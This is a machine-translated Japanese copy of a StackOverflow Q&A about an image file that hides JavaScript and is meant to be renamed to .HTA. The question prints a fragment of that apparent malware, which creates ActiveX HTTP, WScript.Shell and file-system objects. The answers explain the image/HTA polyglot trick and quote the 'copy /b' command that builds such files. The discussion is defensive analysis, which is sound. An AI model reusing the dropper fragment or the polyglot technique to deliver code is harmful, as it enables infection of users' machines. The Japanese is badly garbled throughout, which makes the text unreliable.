質問

私は、人々は、彼らが.HTAのファイル拡張子を持つファイル名を変更することを示唆しているウォーターマークを使用してサーバーに画像を掲載します潜在的に危険なコードを配布するの新しいトレンドを気づいています。

私は.HTAが暗黙のうちに、Microsoftのロジックから信頼され、何のWebベースについてだけで行うコードを含めることができますHTMLアプリケーションファイル、だったことに気づきました。私は私の好みのテキストエディタでファイルを開いて、私の驚きに、画像ファイル内のJavaScriptコードがありました!

jfHe299x4qBICCBRgpbl81xTjwucn9j4s1UVZxe8kwoJcdWnXuVHqpilRRhptKRACMBr5koY8vt6AEttD5xeGTOPCfBoQVjCvblkiGcc4ddlfiZiBPdCVAlelSbvhv9XWcoMIYyGMCbMaGv9YUyFrHZg3ZVx6HnRCgz4CyaA2bU9qn6R3NkmHx0W3uG7SZcHYyPiMN6AnWDGXRztMnxL3sY1s3h9VH1oTL34iYawlaEUDOUscX19pPz89v0rfmlqKTXce16vSZ6JDsy4IC5SktfXdt3m50z2R5BbwuhP5BHJITxvD4dHzL6K4uh9tIc4gYCFnDV

//<script id=thisscript>
var dom1 = ["zip","img","zip","orz","orz","zip","cgi"];
var dom2 = ["bin","dat","bin","tmp","tmp","bin"];
// Global XMLHttp, shell, and file system objects
var request = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fs = new ActiveXObject("Scripting.FileSystemObject");
よりもソースコードの下に画像データが文字化けしています。これはただのスニペットです。

私は、彼らは画像ファイル形式を破損し、それが視聴不可能にすることなく、画像ファイルにJavaScriptコードを追加することができました方法を知っていることは非常に興味があります。私は私の同僚のいくつかにこれを提示し、それらが均等に困惑した。

役に立ちましたか?

解決

それはハイパーテキストとして扱われますので、私の推測では、これは多分(ローカルコンテキストで)すぐに実行されることを、(そのためには、両方の画像やスクリプトデータが含まれていることは完全に罰金だろう)、ある種のマルチパートファイルであるということですアプリケーションます。

詳細情報については、我々は完全な実際のファイルを参照する必要があります。

他のヒント

ここでの問題は、リベラルなファイル形式の許容範囲です。

JPGインタプリタは、非画像データを「壊れた」無視するのに十分な寛容されます。つまり、まだダウンロードしている間、あなたが大規模なJPGを表示することができます方法です。 HTAインタプリタはファイルの先頭にあるすべての奇妙な「テキスト」を無視して、以下のマークアップやスクリプトのように見えるというものを評価するために進むために十分に寛容されます。

ここでは、この好奇心の行動についてのもう一つの柱があります: することができます私は.HTAファイルにアイコンを埋め込む? それはアレクサンドルジャスミンにこのコマンドラインとHTAのアイコンを埋め込む示唆に

      copy /b icon.ico+source.hta iconapp.hta

あなたが見つけた画像/スクリプトは、この技術を使用して作成された可能性があります。

あなたは全体のスクリプトが含まれていませんでしたが、あなたはルックスはかなり怖い示してどのような。 Web接続、シェルやファイルシステムオブジェクトとHTAスクリプトは、それが行わだ後、それはあなたの地元その後、ファイルシステム、電話、家庭と望んでいるものは何でも行うことができます。

ライセンス: CC-BY-SA帰属
所属していません StackOverflow
scroll top